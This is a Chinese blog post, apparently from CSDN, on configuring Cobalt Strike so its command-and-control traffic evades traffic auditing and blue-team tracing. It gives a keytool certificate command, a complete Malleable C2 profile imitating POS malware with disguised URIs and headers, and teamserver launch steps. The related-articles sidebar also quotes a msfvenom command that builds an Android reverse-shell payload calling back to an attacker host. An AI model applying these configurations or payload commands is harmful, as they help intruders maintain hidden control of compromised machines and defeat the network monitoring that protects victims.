kali启动cobaltstrike_Cobalt Strike绕过流量审查

最新推荐文章于 2024-05-12 03:51:24 发布
最新推荐文章于 2024-05-12 03:51:24 发布
阅读量984 收藏 2
点赞数 1
文章标签: kali启动cobaltstrike

Cobalt Strike绕过流量审查

声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!

Cobalt Strike简介

Cobalt Strike is software for Adversary Simulations and Red Team Operations. Cobalt Strike 简称CS。CS是一款优秀的内网渗透工具,可以在获取控制权限后进行长久权限维持,快速进行内网提权,凭据导出,密码提取等。在后渗透中如果未修改特征,容易被流量审计设备监控,被蓝队溯源。多人运动来不来?8b3a49963a8c3c23056430366f451c80.png

证书生成

0x01 KeyTool介绍

keytool是秘钥和证书管理工具,它能使用户自己管理自己的公钥/私钥对及相关证书,用于(通过数字签名)自我认证(用户向别的用户/服务认证自己)或数据完整性以及认证服务。在JDK 1.4以后的版本中都包含了这一工具,位于“%JAVA_HOME%\bin\keytool.exe”。

0x02 创建新的CobaltStrike.store

1.利用keytool生成自己的免费证书(可在kali上生成)

keytool -genkey -alias  google.com -keyalg RSA -validity 36500 -keystore cobaltstrike.store
  注意:这里记得-alias后面的参数和-keystore后面的参数后面会用到C2-profile里面
  • -alias 指定别名
  • -storepass pass 和 -keypass pass 指定密钥
  • -keyalg 指定算法
  • -dname 指定所有者信息
  • -validity 指定证书有效时间

接下来需要设置密码,一定要记得这串密码,后面password处会用到,不然到时候你需要自己回来重新生成下bac64bd0dba5f97ec49e1aa2c5e65b5e.png注意:里面的内容随意填写,问你是否正确的时候输入y,然后回车后就成功生成了。证书就在当前目录下

查看刚才生成的证书

进去后输入刚才设置的口令密码

keytool -list  -v -keystore ./cobaltstrike.store

5f5f0bcbbc0c4639d4f67d89494cf934.png

创建C2.profile文件

1.新建一个文件,名叫c2.profile,加入以下内容(里面内容根据自己前面生成的证书对应内容进行修改)

set sample_name "tryblog POS Malware";
 
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "0";    # throw in a 0% jitter
 
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
 
#设置证书,注意以下内容得和你之前生成的证书一样
https-certificate {
    set CN       "sky"; 
    set O        "sky";   
    set C        "sky";
    set L        "sky";
    set OU       "sky";  
    set ST       "sky";
    set validity "365";
}
#设置,修改成你的证书名称和证书密码
code-signer{
    set keystore "cobaltstrike.store";
    set password "123456";
    set alias "google.com";
}
 
#指定DNS beacon不用的时候指定到IP地址,0.0.0.0是Cobalt Strike DNS Beacon特征,可设置Malleable C2进行修改 输入set dns_idle "8.8.4.4";
set dns_idle "8.8.4.4";
 
#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
 
#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";
 
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
 
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";
 
        id {
            netbios;
            parameter "id";
        }
 
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
 
    server {
        output {
            print;
        }
    }
}
 
http-get {
    set uri "/updates";
 
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
 
    server {
        header "Content-Type" "text/plain";
 
        output {
            base64;
            print;
        }
    }

验证证书

1.进入cs文件夹,将刚刚生成的证书,和创建的c2.profile文件复制进去。

./c2lint C2.profile   #命令后面跟你自己的c2文件

显示这样就成功了。7bd4a05474f182bed28396fc55a06330.png

使用证书启动teamserver

./teamserver 1.1.2.3 123456 ./C2.profile

重要提示:建议编辑teamserver文件,在最后把启动的端口修改一下,尽量别使用默认的50050端口启动。

我是"含光",刚踏入安全圈的一介草民

参考链接:cs绕过流量审计

weixin_39533174
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali2020.4 linux 安装cobaltstrike4.2.docx
05-03
安装 cobaltstrike4.2
浏览器打开出现证书错误_【操作】Cobalt Strike 浏览器跳板攻击
weixin_39977136的博客
11-17 731
0x01 概念介绍浏览器跳板攻击(Browser Pivoting)是一个应用层的跳板技术。设想一个场景:攻击者获取了目标机器的 Beacon shell,然后通过 Cobalt Strike 的 screenshot 工具进行截屏,看到受害机上的终端用户正在与 web 应用程序进行交互,比如登陆了在线邮箱,正在邮箱应用的网页版客户端查看邮件。这种应用对于实现后渗透目标具有很高的价值。如...
2024年网络安全最新Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4,网络安全开发真等于废人
最新发布
2401_84302628的博客
05-12 942
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Cobalt Strike(CS)介绍,安装及初步使用(学习笔记1)
m0_63239459的博客
03-05 3400
Cobalt Strike工具学习(新手级教程)
KaliCobalt Strike4.4的安装
dzqxwzoe的博客
02-26 1327
(一)Clbalt Strike特点1、认识CS2、生成PayLoad3、部署模块(二)Clbalt Strike4.4安装与环境配置(kali)环境准备:2.1 其他linux系统安装jdk1 升级APT2 使用APT安装OpenJDK 11:3 将OpenJDK 11设置为默认 Java程序2.2 开始安装1、点击这个选择解压路径2、点击解压按钮3、创建新的解压文件名4、完成解压5、启动服务器赋777权限。
kali渗透之综合实战拿下root全过程
m0_56988395的博客
02-25 8750
目录 靶机 攻击机 开局先扫端口 keystore:密钥的储存库 提权 1、根据版本找一下看有没有漏洞 2、sudo -l 3、history 4、利用weatweb来识别一下http用的什么程序 发现数据库用户名为root,密码为空密码,进到mysql看看 登录一下milton 切换blumbergh用户 最后开个新终端进行监听端口 注:以下内容仅供交流学习,请勿用于非法途径 这次渗透涉及的知识点较多,难度稍微复杂些许 靶机 DC-9(需要主机模式
Kali 2021:用Metasploit实验入侵自己的安卓手机
weixin_52221158的博客
07-19 9660
报错详细解决
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为...
Cobalt Strike 4.5
09-21
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名...
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start...
Kali 2020:用Metasploit实验入侵自己的安卓手机
热门推荐
askos的博客
11-01 1万+
目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk 2,使用zipzlign对apk进行对齐 zipalign -v 4 t.apk tz
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2314
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
kali启动cobaltstrike_Cobalt Strike & MetaSploit 联动
weixin_39626162的博客
11-26 1085
转载: IRT 工控安全红队0x01 准备工作受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。MSF:本地 kaliCobalt Strike 团队服务器:Ubuntu VPSCobalt Strike:3.14团队服务器:客户端:上线过程:因为我关闭了一切杀软及 Windows Defender,自不必做免杀。一些朋友搞不清楚 Wi...
kali安装cobaltstrike详细教程
Cwillchris的博客
12-30 4354
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。
kali下打开cobaltstrike
m0_74290869的博客
07-04 1015
2,cd 进入cs所在的文件夹中(我的是在Desktop中)5,不要关闭此终端,再打开一个终端(命令如图,进入服务)./teamserver kali的ip 密码(自定)3, 获取对此文件操作的最高权限。1,将cs文件夹放在kali中。
Cobalt Strike(CS)流量分析
小千安全
04-21 6634
为了识别 Cobalt Strike 生成的 HTTPS 流量,可以收集不同 TLS 实现的 JA3S 值,构建 JA3S 签名库,并结合其他特征和行为进行综合分析和判断。同时,反编译CS的源代码也可以得知,92L对应于x86位的木马,而93L对应于x64位的后门。在 HTTPS 协议的 Client Hello 和 Server Hello 阶段,都包含了 JA3S 值传输过程过程中会有 ja3,这个值在系统上是固定的,win10是一种的 但win11是另一种 他们取决于操作系统。
KaliCobalt Strike4.0的安装
汗的博客
03-28 1万+
文章目录安装环境及版本配置Java环境部署TeamServer部署CobaltStrike 安装环境及版本 Kali2019.4 CobaltStrike4.0:Gcow安全团队提供的下载,有需要的可以从Gcow团队公众号往期文章获取 文件夹所有文件:agscript cobaltstrike.auth cobaltstrike.jar icon.jpg peclone sta...
kali启动Cobalt Strike
07-28
你可以按照以下步骤启动 Cobalt StrikeKali Linux 上: 1. 首先,确保你已经安装了 Kali Linux,并且已经下载了 Cobalt Strike。 2. 打开终端,导航到 Cobalt Strike 的安装目录。 3. 在终端中输入命令 `./...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值